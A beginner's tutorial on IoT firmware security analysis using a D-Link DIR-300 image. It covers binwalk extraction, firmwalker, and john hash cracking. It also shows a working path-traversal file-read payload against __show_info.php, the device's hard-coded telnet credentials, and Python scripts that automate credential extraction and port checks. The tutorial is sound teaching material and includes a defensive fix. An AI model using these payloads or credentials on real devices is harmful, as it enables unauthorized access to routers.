Firmware Analysis of IoT Devices: A Beginner’s Guide

Introduction

In recent years IoT devices have spread into every corner of daily life and bring real convenience. Because they also generate and handle large amounts of personal data, their security has become a growing concern. In the previous article we looked at controlling Xiaomi devices with scripts, that is, security analysis from the traffic side; in this article we analyze vulnerabilities in the firmware itself.

Getting Started

“To do a good job, one must first sharpen one’s tools.” Before we begin, let’s set up the firmware analysis environment, which mainly means installing binwalk. Firmware is compressed and packaged in many different ways, and a bare apt install binwalk only supports a fraction of the file system formats: the extraction helpers (sasquatch, jefferson, ubi_reader, yaffshiv and so on) have to be installed separately before binwalk can pull the file systems out of most images. The official binwalk installation documentation describes the complete installation. Doing it by hand every time is tedious, so I wrote a script to automate it.

Because a lot of dependency packages have to be installed and the default Ubuntu apt mirrors are very slow from here, it is worth switching to Alibaba Cloud’s mirror, following this article. Doing that by hand each time is also time-consuming, so I wrote a script that switches the sources automatically, shown below.

#!/bin/bash
# change_sources.sh: point apt and pip at the Alibaba Cloud (aliyun) mirrors.
set -e

# [*] change Ubuntu system sources to the aliyun mirror
# (wrap this block in :<<BLOCK ... BLOCK to skip it)
sudo mv /etc/apt/sources.list /etc/apt/sources.list.bak.1

# -cs prints only the codename (e.g. bionic); no "Codename:" prefix to cut off
codename=$(lsb_release -cs)
echo "codename is $codename"

# Build the list and write it with tee. "sudo echo ... >> file" does not work:
# the redirection is performed by the unprivileged shell, not by sudo.
sources=""
for suite in "$codename" "$codename-security" "$codename-updates" "$codename-backports" "$codename-proposed"; do
    sources+="deb http://mirrors.aliyun.com/ubuntu/ $suite main restricted universe multiverse\n"
    sources+="deb-src http://mirrors.aliyun.com/ubuntu/ $suite main restricted universe multiverse\n"
done
printf "$sources" | sudo tee /etc/apt/sources.list > /dev/null

sudo apt-get update

# [*] change pip sources to the aliyun mirror
# ~/.pip belongs to the current user, so no sudo here (sudo would leave root-owned files in $HOME)
mkdir -p ~/.pip
if [ -f ~/.pip/pip.conf ]; then
    mv ~/.pip/pip.conf ~/.pip/pip.conf.bak
fi
cat > ~/.pip/pip.conf <<EOF
[global]
index-url = https://mirrors.aliyun.com/pypi/simple
EOF

The script has two parts: first it replaces the Ubuntu apt sources with Alibaba Cloud’s mirror, generating a sources.list that matches the codename of the running Ubuntu release; then it points pip at the same mirror. After the change, package installation is dozens of times faster.

Next, install the full version of binwalk. I downloaded binwalk and the related plugins from GitHub (they are bundled in the tools repository listed at the end of the article), as shown in the figure below.

The installation script is install_binwalk.sh, shown below. It follows the official installation instructions (binwalk ships a ./deps.sh script for this, but it is very slow and not very usable). The script currently supports only Python 2.7.

#!/bin/bash
# install_binwalk.sh: install binwalk plus the extraction helpers it calls,
# following the official INSTALL.md. Expects the binwalk, sasquatch, jefferson,
# ubi_reader, yaffshiv and stuff directories to sit next to this script.
# Python 2.7 only (python-* packages, "python setup.py install").
set -e

# dependencies
sudo apt -y install python-lzma python-crypto
sudo apt -y install libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip

sudo pip install pyqtgraph
sudo pip install capstone

# Install standard extraction utilities (required)
sudo apt -y install mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord

# Install binwalk from the bundled source tree (the distro package lags behind and lacks the plugins)
#sudo apt-get install binwalk
# Each install runs in a subshell so a failed cd cannot run setup.py in the wrong directory
(cd binwalk && sudo python setup.py install)

# Install sasquatch to extract non-standard SquashFS images (required)
sudo apt -y install zlib1g-dev liblzma-dev liblzo2-dev
(cd sasquatch && sudo ./build.sh)

# Install jefferson to extract JFFS2 file systems (optional)
sudo pip install cstruct
(cd jefferson && sudo python setup.py install)

# Install ubi_reader to extract UBIFS file systems (optional)
sudo apt -y install liblzo2-dev python-lzo
(cd ubi_reader && sudo python setup.py install)

# Install yaffshiv to extract YAFFS file systems (optional)
(cd yaffshiv && sudo python setup.py install)

# Install unstuff (closed source) to extract StuffIt archive files
sudo cp stuff/bin/unstuff /usr/local/bin/

After running this script, binwalk can extract most firmware. As an example we use the D-Link DIR-300 firmware image included in the tool bundle. Run (-M recurses into anything that is extracted, -e extracts):

binwalk -Me DIR-300_REVA_FIRMWARE_1.06B05_WW.zip

The extraction log shows the SquashFS file system being recognized and extracted.

The extracted root file system (squashfs-root) is shown in the image above. The next step is to analyze the files inside it.
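What binwalk does in the step above, before any extraction, is scan the image for the magic values of known headers and file systems and report their offsets. The script below is an added example (not code from the article or from binwalk) that does a minimal version of that scan and decodes a few SquashFS superblock fields; the firmware blob it scans is constructed inline so it runs offline, and the signature list and field layout are the standard ones, not taken from the page.

```python
"""Minimal file-system signature scan, the first thing binwalk does on an image."""
import struct
import sys

# (description, magic bytes) for formats commonly found in router firmware.
# Short magics (2-3 bytes) produce false positives on real images; binwalk
# validates the full header before reporting, this scan does not.
SIGNATURES = [
    ("uImage header", b"\x27\x05\x19\x56"),     # U-Boot legacy image
    ("SquashFS (little endian)", b"hsqs"),
    ("SquashFS (big endian)", b"sqsh"),
    ("gzip", b"\x1f\x8b\x08"),
    ("JFFS2 (little endian)", b"\x85\x19"),     # node header magic 0x1985
    ("CramFS", b"\x45\x3d\xcd\x28"),
    ("LZMA", b"\x5d\x00\x00"),                  # common lc/lp/pb properties byte
]

COMPRESSORS = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}


def scan(blob):
    """Return [(offset, description), ...] for every signature hit, sorted by offset."""
    hits = []
    for name, magic in SIGNATURES:
        start = 0
        while True:
            off = blob.find(magic, start)
            if off < 0:
                break
            hits.append((off, name))
            start = off + 1
    return sorted(hits)


def squashfs_info(blob, off):
    """Decode the first fields of a little-endian SquashFS v4 superblock at off."""
    (_magic, inodes, _mkfs_time, block_size, _frags,
     compressor, _block_log, _flags, _no_ids, major, minor) = struct.unpack_from("<IIIIIHHHHHH", blob, off)
    return {
        "version": "%d.%d" % (major, minor),
        "inodes": inodes,
        "block_size": block_size,
        "compressor": COMPRESSORS.get(compressor, "unknown(%d)" % compressor),
    }


def build_sample():
    """Constructed fake firmware: uImage header, gzip'd kernel stub, flash padding, SquashFS superblock."""
    hdr = b"\x27\x05\x19\x56" + b"\x00" * 60          # 64-byte uImage header, other fields zeroed
    kernel = b"\x1f\x8b\x08\x00" + b"\xaa" * 100      # gzip magic followed by junk
    pad = b"\xff" * (0x1000 - len(hdr) - len(kernel))  # erased-flash padding up to the rootfs
    # magic 'hsqs', 42 inodes, mkfs time, 128 KiB blocks, 3 fragments, gzip, block_log 17,
    # flags 0, 4 ids, version 4.0, root inode reference
    sb = struct.pack("<IIIIIHHHHHHQ", 0x73717368, 42, 1530000000, 0x20000, 3, 1, 17, 0, 4, 4, 0, 0x40000)
    return hdr + kernel + pad + sb + b"\x00" * 16


def report(blob):
    """Human-readable listing in the spirit of binwalk's signature table."""
    lines = []
    for off, name in scan(blob):
        extra = ""
        if name.startswith("SquashFS (little"):
            extra = "  %s" % squashfs_info(blob, off)
        lines.append("0x%08X  %s%s" % (off, name, extra))
    return lines


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print("\n".join(report(data)))
```

Run it on a real image with the path as the only argument; on the constructed sample it reports the uImage header at 0x0, the gzip stream at 0x40 and the SquashFS superblock at 0x1000, which is where you would point unsquashfs (or sasquatch for vendor-modified images) with an offset.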

Main Content

1. Remote Login Password Analysis

I have long thought that many firmware images expose simple but very harmful weaknesses, such as weak login passwords and web vulnerabilities, and that a script which automatically flags them would save a lot of time. What I could think of, someone had already implemented: firmwalker (the firmwalk directory in the tool bundle). It is simple to run; from the directory containing it, run:

./firmwalker.sh firmware_file_system_path

where the argument is the path to the extracted firmware file system. For the D-Link DIR-300 the output looks like this.

This is part of the script’s output. Files containing keywords such as admin, root and password have been listed; they may hold credentials. Let’s look for hard-coded passwords for services such as telnet, ftp, ssh and the web interface. In the output, the keyword telnet was found in /etc/scripts/system.sh. That file is run at system start, which means the telnet service is started at boot, so it is a promising lead. Opening it, I did find the telnet startup command, as shown in the image below.

Looking at the file in vim:

The highlighted line is the telnetd startup command. The -u option appears to take username:password; the username is Alphanetworks, and the password is a variable whose value is the output of cat /etc/config/image_sign. Let’s see what that file contains.

The password is wrgg19cdlwbr_dir300; following the clues makes it easy to find. But why are we sure that the -u option takes the username and password? Check the telnetd binary itself: run strings on it (or open it in vim) and search for the usage text, as shown below.

The usage text confirms the meaning of -u. Searching online for the telnet password of this firmware turns up the same value, so we have found the right one.

Other firmware may contain /etc/passwd or /etc/passwd.bak with the password hashes in the second field (rather than x, which points to a shadow file). Those hashes can be cracked with john, as shown below.

The hash was cracked: the credentials are admin:1234.
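The two checks above, finding the telnetd -u credentials and following the password variable to the file it is read from, and deciding whether /etc/passwd holds hashes worth giving to john, can be automated. The script below is an added example, not part of the article or of firmwalker; it walks an extracted root file system and performs both checks. The sample root file system is constructed in a temporary directory and reproduces the pattern described above (the hash in it is a made-up placeholder, not a real one), and the regular expressions are assumptions about how such startup scripts are written.

```python
"""Hunt for hard-coded service credentials in an extracted root file system."""
import os
import re
import sys
import tempfile

# telnetd ... -u user:pass   (pass may be a literal, $VAR, $(cat FILE) or `cat FILE`)
TELNETD_RE = re.compile(r"telnetd\b[^\n]*?-u\s+(\S+?):(\S+)")
CAT_RE = re.compile(r"^(?:\$\(|`)\s*cat\s+(\S+?)\s*(?:\)|`)$")
VAR_RE = re.compile(r"^\$\{?(\w+)\}?$")


def resolve(value, script_text, rootfs):
    """Turn a password token into a literal: follow $VAR to its assignment, then `cat FILE` to the file."""
    m = VAR_RE.match(value)
    if m:
        assign = re.search(r"^\s*%s=(.+?)\s*$" % re.escape(m.group(1)), script_text, re.M)
        if not assign:
            return value                      # unresolved variable, report as-is
        value = assign.group(1)
    m = CAT_RE.match(value)
    if m:
        target = os.path.join(rootfs, m.group(1).lstrip("/"))   # path is relative to the rootfs
        if os.path.isfile(target):
            with open(target, errors="ignore") as f:
                return f.read().strip()
    return value.strip("\"'")


def find_telnet_creds(rootfs):
    """Return [(script, user, password)] for every telnetd -u invocation in a shell script."""
    found = []
    for root, _dirs, files in os.walk(rootfs):
        for name in files:
            path = os.path.join(root, name)
            if os.path.islink(path):
                continue                      # extracted firmware is full of symlinks
            with open(path, "rb") as f:
                if f.read(2) != b"#!":
                    continue                  # only scripts; binaries get the strings treatment instead
            with open(path, errors="ignore") as f:
                text = f.read()
            for user, password in TELNETD_RE.findall(text):
                found.append((os.path.relpath(path, rootfs), user.strip("\"'"), resolve(password, text, rootfs)))
    return sorted(found)


def check_passwd(rootfs):
    """Classify each /etc/passwd entry by its password field."""
    path = os.path.join(rootfs, "etc/passwd")
    if not os.path.isfile(path):
        return []
    results = []
    with open(path, errors="ignore") as f:
        for line in f:
            parts = line.rstrip("\n").split(":")
            if len(parts) < 2:
                continue
            user, field = parts[0], parts[1]
            if field == "":
                status = "empty password"
            elif field in ("x", "*", "!", "!!"):
                status = "shadowed or locked"
            else:
                status = "hash present (try john)"
            results.append((user, status))
    return results


def build_sample_rootfs():
    """Constructed rootfs: startup script, password file it reads, and an /etc/passwd with three cases."""
    root = tempfile.mkdtemp(prefix="rootfs-")
    os.makedirs(os.path.join(root, "etc/scripts"))
    os.makedirs(os.path.join(root, "etc/config"))
    with open(os.path.join(root, "etc/scripts/system.sh"), "w") as f:
        f.write("#!/bin/sh\nimage_sign=`cat /etc/config/image_sign`\n"
                "echo \"starting services\"\n"
                "telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &\n")
    with open(os.path.join(root, "etc/config/image_sign"), "w") as f:
        f.write("wrgg19cdlwbr_dir300\n")
    with open(os.path.join(root, "etc/passwd"), "w") as f:
        f.write("root:$1$zAqJw$constructedfakehash000000:0:0:root:/:/bin/sh\n"
                "admin::0:0:admin:/:/bin/sh\n"
                "nobody:x:99:99:nobody:/:/bin/false\n")
    return root


if __name__ == "__main__":
    rootfs = sys.argv[1] if len(sys.argv) > 1 else build_sample_rootfs()
    for script, user, password in find_telnet_creds(rootfs):
        print("%s: telnetd -u %s:%s" % (script, user, password))
    for user, status in check_passwd(rootfs):
        print("/etc/passwd %s: %s" % (user, status))
```

Point it at squashfs-root to run it on a real extraction. It deliberately stops at reporting: the "hash present" entries are what you hand to john, and an "empty password" entry is a finding on its own.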

2. Simple Web Vulnerability Discovery and Exploitation

Most firmware has a web interface, and the source of its web pages is right there in the extracted file system. Is there a tool that finds simple vulnerabilities by auditing that source? Yes: RIPS, a static analysis tool for PHP that automatically digs out potential security vulnerabilities in PHP source code. Since RIPS itself is written in PHP, first set up PHP and a web server:

sudo apt install apache2 php7.2 libapache2-mod-php7.2
sudo /etc/init.d/apache2 restart

Download RIPS (the download address is in the references); unzip it and place it under /var/www/html/, as shown in the image below.

Then open http://127.0.0.1/rips/ in the browser.

In the path/file field enter the path of the firmware’s web source code (here squashfs-root/www) and click scan to see the results, as shown below.

Scanned 320 files, Nothing vulnerable found: nothing was found. That is fine; this was only a quick check of RIPS’s capabilities, because vulnerabilities in the D-Link DIR-300 series have already been published. One example is the information leak in squashfs-root/www/model/__show_info.php, shown in the image below.

The page reads the file named by the REQUIRE_FILE parameter and refuses the two values var/etc/httpasswd and var/etc/hnapasswd, so at first glance the account password cannot be obtained. But the check is a plain string comparison: writing the same path with a leading slash, starting from the root directory, matches neither string yet names the same file, which bypasses the filter. Payload:

localhost/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

REQUIRE_FILE=/var/etc/httpasswd passes the if check, and since the page reads whatever file it is given, this is an arbitrary file read. A blocklist of literal strings can never enumerate every spelling of a path (leading slash, ../, doubled slashes, symlinks); the robust fix is to canonicalize the path and compare it against an allowlist of permitted files. Bugs of this kind still have to be found by manual auditing. Now the question is how to verify the weaknesses we have found.
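The following is an added example (not the article’s or D-Link’s code; the real PHP of __show_info.php is not reproduced here) showing in Python why the check described above fails and what a safe version looks like. The blocklist function is a reconstruction of the described logic, the document root /www and the assumption that relative paths are resolved from / are mine, and the hardened version canonicalizes the parameter and only allows files under the document root.

```python
"""String blocklist on a file path (bypassable) versus canonicalize-and-allowlist."""
import posixpath

WEB_ROOT = "/www"                                   # assumed document root, not from the page
BLOCKED = ("var/etc/httpasswd", "var/etc/hnapasswd")  # the two literals the page compares against


def blocklist_allows(require_file):
    """Reconstruction of the flawed check: the raw parameter is compared with two literal strings."""
    return require_file not in BLOCKED


def same_file(a, b, cwd="/"):
    """True when two spellings resolve to the same path (assuming the web server's cwd is /)."""
    return posixpath.normpath(posixpath.join(cwd, a)) == posixpath.normpath(posixpath.join(cwd, b))


def hardened_path(require_file, web_root=WEB_ROOT):
    """Canonicalize and allow only files strictly inside web_root; return the path or None.

    posixpath is used so the result does not depend on the host running this script.
    On the device itself, use os.path.realpath as well so symlinks cannot point outside."""
    if not require_file or require_file.startswith("/") or "\x00" in require_file:
        return None                                  # absolute paths and NUL bytes are never legitimate
    resolved = posixpath.normpath(posixpath.join(web_root, require_file))
    if not resolved.startswith(web_root + "/"):      # '..' components collapsed above; must stay inside
        return None
    return resolved


if __name__ == "__main__":
    for candidate in ("var/etc/httpasswd", "/var/etc/httpasswd", "../var/etc/httpasswd",
                      "model/../model/__show_info.php"):
        print("%-32s blocklist allows: %-5s  hardened: %s" % (
            candidate, blocklist_allows(candidate), hardened_path(candidate)))
```

The payload from the article is the second candidate: the blocklist lets it through because the string differs, while same_file shows it is the very file the blocklist meant to protect. The hardened check rejects it, rejects the ../ variant, and still serves a legitimate page under the document root.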

Firmware Simulation

I had set up a firmware emulation environment before and found it cumbersome, and I initially planned to script it. But someone has already done that and packaged it into a virtual machine for direct use: AttifyOS. After downloading it, run the tool in tools/firmadyne to emulate the D-Link DIR-300 firmware:

python fat.py ./DIR-300_REVA_FIRMWARE_1.06B05_WW.zip

When the network interface is brought up, as shown in the image above, the emulation has succeeded. Now we can check whether the vulnerabilities found above really exist. First the web vulnerability; open in the browser:

192.168.0.1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

As shown in the image above, the credentials were read: the username is admin and the password is empty. Logging in with them, we enter the web interface, as shown in the image below.
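The verification just done in the browser (and, in the next paragraphs, with nmap and telnet) is the kind of check worth making repeatable, because it has to be rerun for every firmware version or device. The script below is an added example, not from the article, AttifyOS or firmadyne: it fetches /var/etc/httpasswd through the file-read bug, parses the user:password lines, and asks whether 23/tcp answers. The default host 192.168.0.1 and the page path come from the article; the assumption that the file is returned verbatim as user:password lines is mine, and the sample response used in the self-test is constructed.

```python
"""Re-check the two findings against an emulated (or real) device."""
import socket
import sys
from urllib.parse import quote
from urllib.request import urlopen

LFI_PAGE = "/model/__show_info.php"   # vulnerable page named in the article
TARGET_FILE = "/var/etc/httpasswd"    # the leading slash is what defeats the blocklist


def lfi_url(base_url, path=TARGET_FILE):
    """Build base_url + page + ?REQUIRE_FILE=<path>, keeping the slashes literal as in the article."""
    return base_url.rstrip("/") + LFI_PAGE + "?REQUIRE_FILE=" + quote(path, safe="/")


def parse_httpasswd(body):
    """Return (user, password) pairs from user:password lines; an empty password is kept, not dropped."""
    creds = []
    for line in body.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue                       # skips blank lines and any HTML the page wraps around the file
        user, _sep, password = line.partition(":")
        creds.append((user, password))
    return creds


def fetch_credentials(base_url, timeout=5):
    """GET the file through the bug and parse it (network access; not exercised by the self-test)."""
    with urlopen(lfi_url(base_url), timeout=timeout) as resp:
        return parse_httpasswd(resp.read().decode("utf-8", "replace"))


def port_open(host, port, timeout=3):
    """TCP connect check, the same question 'nmap -p <port>' answers."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
    for user, password in fetch_credentials("http://" + host):
        print("web login: %r / %r" % (user, password))
    print("telnet (23/tcp) open:", port_open(host, 23))
```

If the page wraps the file in HTML, parse_httpasswd only keeps lines containing a colon, so check the raw response once before trusting its output; and a successful connect on port 23 only tells you a listener exists, not that the login works, which is exactly the distinction the telnet attempt below runs into.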

Next, the telnet password. First scan with nmap (for example nmap -p 23 192.168.0.1) to see whether the telnet service is listening, as shown in the image below.

Port 23 is open, confirming that the telnet service is started at boot. Let’s try to log in with telnet, as shown in the image below.

Telnet prints its connection banner and appears to connect, but no password prompt appears and commands return no output, so the telnet service is not working in this environment. This may be an artifact of the emulation rather than of the firmware; to settle it, one would test another DIR-300 firmware version or a real device. Although this last step did not succeed, the whole workflow is clear. The tools used, together with the scripts for setting up the environment, are available at the following link:

https://github.com/scu-igroup/firmware_analysis

The tool file structure on GitHub:

change_sources.sh……….….Script to change Ubuntu system source and pip source

Installfullbinwalk……………Script to install the full version of binwalk

firmwalk……………………..….Firmware analysis tool

rips………………………………PHP source auditing tool

Conclusion

That completes this introduction to firmware security analysis. It looks simple, but it is a considerable amount of work for a beginner; setting up the analysis environment alone can be a challenge for anyone unfamiliar with Linux. Taking it patiently, one step at a time, there is always something to be gained. In this article I wrote several scripts to help set up the analysis environment, used several tools to help discover firmware vulnerabilities, and showed how firmware emulation can be used to verify them. Advanced vulnerability discovery depends on continued learning and practice. This article is only a starting point; everyone is welcome to discuss it and to recommend good firmware analysis methods so we can learn together.

References

1. https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md

2. https://blog.csdn.net/zhangjiahao14/article/details/80554616

3. https://github.com/craigz28/firmwalker

4. https://sourceforge.net/projects/rips-scanner/

5. https://github.com/adi0x90/attifyos

*This article is authored by scu-igroup and belongs to the FreeBuf original reward program. Unauthorized reproduction is prohibited.
